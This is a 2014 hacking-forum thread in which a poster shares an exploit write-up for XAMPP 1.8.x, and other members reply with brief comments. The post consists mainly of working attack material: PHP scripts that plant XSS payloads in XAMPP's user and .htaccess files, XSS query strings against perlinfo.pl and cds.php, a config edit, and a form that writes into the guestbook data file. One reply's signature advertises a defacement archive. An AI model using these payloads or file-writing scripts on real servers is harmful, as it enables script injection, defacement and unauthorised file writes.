Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


XAMPP 1.8.x Multiple Vulnerabilities

  • 1 Vote(s) - 5 Average


10-19-2014, 03:27 PM #1
DevilScreaM Offline root:x:0:0:root:/root:/bin/bash *****
MaDLeeTs LoVer
Posts:7 Threads:7 Joined:Oct 2013 Reputation: 1
Mood: None
http://1337day.com/exploit/22729 Biggrinsmiley

Code:
#Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities
#Author : DevilScreaM
#Date : 6 October 2014
#Vendor : http://bitnami.com
#Version : 1.8.x or Higher Version
#Operating System : Windows / Linux
#Vulnerability : Cross Site Scripting / Write File
#Type : #WebApps #Application
#Tested : Windows 7 64 Bit
#Thanks : Newbie-Security, Indonesian Hacker Team, Indonesia Coder Team, Indonesia Security Team


Cross Site Scripting at perlinfo.pl #1

Perl Version : 5.16.3

Script For Exploit

For Localhost

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "C:\xampp\security\xampp.users"
require valid-user';
$f1 [email protected] ('C:\xampp\htdocs\xampp\.htaccess','w');
fwrite($f1 , $htcs);
?>

<script>
window.location = "http://127.0.0.1/xampp/perlinfo.pl"
</script>


==================================================================

For Site

<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('my.users','w');
fwrite($f , $xss);

$htcs  = 'AuthName "Username = your Script XSS"
AuthType Basic
AuthUserFile "my.users"
require valid-user';
$f1 [email protected] ('.htaccess','w');
fwrite($f1 , $htcs);

$pl = '#!"perl\bin\perl.exe"

use HTML::Perlinfo;
use CGI qw(header);

$q = new CGI;
print $q->header;

$p = new HTML::Perlinfo;
$p->info_general;
$p->info_variables;
$p->info_modules;
$p->info_license;';
$f2 [email protected] ('perlinfo.pl','w');
fwrite(f2 , $pl);
?>

<script>
window.location = "http://site.com/perlinfo.pl"
</script>

==================================================================

Save Script C:\xampp\htdocs\xss.php


Open Browser and Running http://127.0.0.1/xss.php
You Will Redirect to http://127.0.0.1/xampp/perlinfo.pl

Auth Login
Username : <script>alert('Tested by DevilScreaM')</script>
Password :


===================================================================

Cross Site Scripting at perlinfo.pl Query String #2

Exploit :

http://127.0.0.1/xampp/perlinfo.pl?[XSS]
http://127.0.0.1/xampp/perlinfo.pl?[XSS]=[XSS]

Example

http://127.0.0.1/xampp/perlinfo.pl?<script>alert('DevilScreaM')</script>=<script>alert('Newbie-Security')</script>


====================================================================

Cross Site Scripting at http://127.0.0.1/xampp/perlinfo.pl #3


Exploit :

1. Go To Directory C:\xampp\apache\conf\
2. Edit File httpd.conf
3. Go To Line 209

Edit ServerAdmin [email protected] to

ServerAdmin [YOUR XSS]

Example :

ServerAdmin <h1>DevilScreaM</h1>


4. Save File

5. See your XSS at

http://127.0.0.1/xampp/perlinfo.pl


====================================================================



Cross Site Scripting at http://127.0.0.1/Webalizer/


Script for Exploit :


<?php
$xss  = "<script>alert('Tested by DevilScreaM')</script>:";
$f [email protected] ('C:\xampp\security\xampp.users','w');
fwrite($f , $xss);

?>

<script>
window.location = "http://127.0.0.1/webalizer/usage_[YEARS][MONTH].html"
</script>

Information :
usage_[YEARS][MONTH].html => usage_201410.html

====================================================================

Save Script Webalizer.php


Command

@echo off
C:\xampp\webalizer\webalizer.exe -c C:\xampp\webalizer\webalizer.conf

PHP

<?php
  
$webalizer = "C:\xampp\webalizer\webalizer.bat";
        
system($webalizer);

?>

=====================================================================

Save Script webalizer.cmd or webalizer_run.php


Run Webalizer.cmd and Waiting Process

Result

http://127.0.0.1/webalizer/usage_[years][month].html

Example

http://127.0.0.1/webalizer/usage_201410.html


==================================================================


Cross Site Scripting at cds.php

Exploit :

http://127.0.0.1/xampp/cds.php?interpret=[XSS]

Example :

http://127.0.0.1/xampp/cds.php?interpret=<script>alert('Tested by> DevilScreaM')</script>

View your XSS at

http://127.0.0.1/xampp/cds-fpdf.php


====================================================================



Write File Vulnerability

Script to Exploit :


<form action='http://127.0.0.1/xampp/guestbook-en.pl' method='get'>
<table border='0' cellpadding='0' cellspacing='0'>
<tr><td>TEXT:</td>
<td><input type='text' size='30' value='Tested by DevilScreaM' name='f_name'></td></tr>
<tr><td></td><td><input type='submit' value='WRITE'></td></tr>
</table></form>
</br></br>
<a href="http://127.0.0.1/xampp/guestbook.dat"><b>Result</b></a>

==================================================================

Save Script with extension .html

Open Script and Click Write or Change Text

Result

http://127.0.0.1/xampp/guestbook.dat

10-19-2014, 06:38 PM #2
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
DevilScreaM nothing against you but why ?
this is just another simple injection and you need a full system access , where is the sense of that ?

[Image: xodhvlpa.jpg]
[Image: test.php]

10-20-2014, 03:01 AM #3
D30N3 Offline TeaM MaDLeeTs ***
TeaM MaDLeeTs
Posts:31 Threads:0 Joined:Oct 2014 Reputation: 3
Mood: Thinking
Oh, just accept it as Vulnerability of web apps, not a full access reverse shell Smiley1

Thanks DevilScreaM. Good job.

B 1 with Every 1

10-20-2014, 04:30 AM #4
T3N38R15 Offline ? lawless-coder *****
Moderators
Posts:812 Threads:48 Joined:Jan 2014 Reputation: 126
Mood: Fine
hmm i accept that a vuln. but on a level between 1 and 10 this is a 0.5 Biggrinsmiley

[Image: xodhvlpa.jpg]
[Image: test.php]

10-20-2014, 05:00 AM #5
SickSpawn Offline You have an error in your SQL syntax; ***
TeaM MaDLeeTs
Posts:85 Threads:28 Joined:Sep 2014 Reputation: 2
Mood: Hacker
hmm... good job DevilScreaM

10-25-2014, 02:00 PM #6
[R]azzor Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:1 Threads:0 Joined:Oct 2014 Reputation: 0
Mood: Alone
Nice Biggrinsmiley ,, Thank's For Sharing Biggrinsmiley

==========================
[+] Name : [R]azzor
[+] Zone-H : http://zone-h.com/archive/notifier=[R]azzor
==========================

10-25-2014, 03:13 PM #7
kiraa Offline Hacker Newbie **
Registered
Posts:1 Threads:0 Joined:Sep 2013 Reputation: 0
Mood: None
Lanjut...

MY EVIL SIDE MAYBE VERY DANGEROUS






Forum Jump:


Users browsing this thread:1 Guest(s)